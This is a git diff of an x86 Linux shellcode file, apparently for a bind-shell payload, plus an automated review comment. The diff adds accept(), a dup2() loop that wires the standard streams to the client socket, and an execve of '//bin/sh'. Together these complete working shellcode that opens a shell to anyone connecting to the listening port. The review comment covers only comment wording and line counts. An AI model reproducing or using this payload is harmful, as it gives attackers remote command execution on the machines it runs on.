Diffstat (limited to 'shellcode')
-rw-r--r--shellcode/socket.asm50
1 files changed, 45 insertions, 5 deletions
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index fe26659..76b8103 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -13,22 +13,24 @@ int 0x80 ; let the kernel do the stuff
; bind()
mov edx,eax ; move socket descriptor (returned by socket()) to edx
-xor eax,eax ; zero out eax again
+xor eax,eax
; sockaddr_in
-push eax ; in_addr = 0
-push word 0x11AA ; push tcp port
-push word 0x2 ; sa_family -> AF_INET = 0x02
+push eax ; sockaddr_in: in_addr = 0
+push word 0x11AA ; sockaddr_in: tcp port
+push word 0x2 ; sockaddr_in: sa_family -> AF_INET = 0x2
mov ecx,esp ; save stack pointer -> pointer to sockaddr struct
push 0x10 ; arg3: socklen -> addrlen
push ecx ; arg2: push pointer to sockaddr to the stack
push edx ; arg1: push sockfd
+; arg2
mov ecx,esp ; move stack pointer to reg (conform to socketcall)
+; arg1
mov ebx,0x02 ; set socket subcall to 0x03 (bind)
mov al,0x66 ; socketcall syscall
int 0x80 ; let the kernel do the stuff
; listen()
-xor eax,eax ; zero out eax
+xor eax,eax
push eax ; backlog
push edx ; sockfd
mov ecx,esp ; save stackptr
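Review bot: The added stand-alone comments `; arg2` (before `mov ecx,esp`) and `; arg1` (before `mov ebx,0x02`) are easy to misread as bind()'s own argument positions, since the pushes just above are already labelled arg1–arg3, whereas these two name the socketcall register arguments. Spelling that out, e.g. `; socketcall arg2 (ecx): pointer to the argument block` and `; socketcall arg1 (ebx): subcall number`, keeps the two numbering schemes apart. The trailing comment on that same `mov ebx,0x02` line still says `set socket subcall to 0x03 (bind)` while the operand is `0x02`, so the number in the comment should be corrected to match the code. The commit also drops the `; zero out eax` comments from the two bare `xor eax,eax` lines, which carried the only hint that only `al` is loaded with the syscall number before the next `int 0x80`; a short comment there is worth keeping. The hunk header counts 24 new-side lines but only 22 are shown, so the bind()/listen() block may continue past the last line visible here.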
@@ -36,6 +38,44 @@ mov al,0x66 ; socketcall()
mov ebx,0x4 ; socketcall 0x4 -> listen()
int 0x80 ; kernel mode
+; accept()
+xor eax,eax
+push eax ; sockaddr: in_addr = 0
+push word ax ; sockaddr: tcp port = 0
+push word 0x2 ; sockaddr: sa_family -> AF_INET
+mov ecx,esp ; save stack pointer
+push 0x10 ; addrlen
+push esp ; pointer to sock addrlen
+push ecx ; push sockaddr_in
+push edx ; sockfd
+mov ecx,esp
+mov ebx,0x5
+mov al,0x66
+int 0x80
+
+; dup2()
+xor ecx,ecx ; zero out count register
+mov cl,0x3 ; loopcount
+mov ebx,eax ; sockfd of the client (see accept())
+dupes:
+xor eax,eax ; zero out eax
+mov al,63 ; dup2() syscall
+dec cl
+int 0x80
+inc cl
+loop dupes ; jump2label
+
+; exec()
+xor eax,eax
+xor ecx,ecx
+cdq
+push 0x68732f6e ; 'hs/n'
+push 0x69622f2f ; 'ib//'
+mov ebx,esp ; arg
+mov byte [esp + 8], al ; null-terminate the string
+mov al,0xb ; execve syscall
+int 0x80
+
; exit()
mov al,0x1 ; exit syscall
mov ebx,0x42 ; return code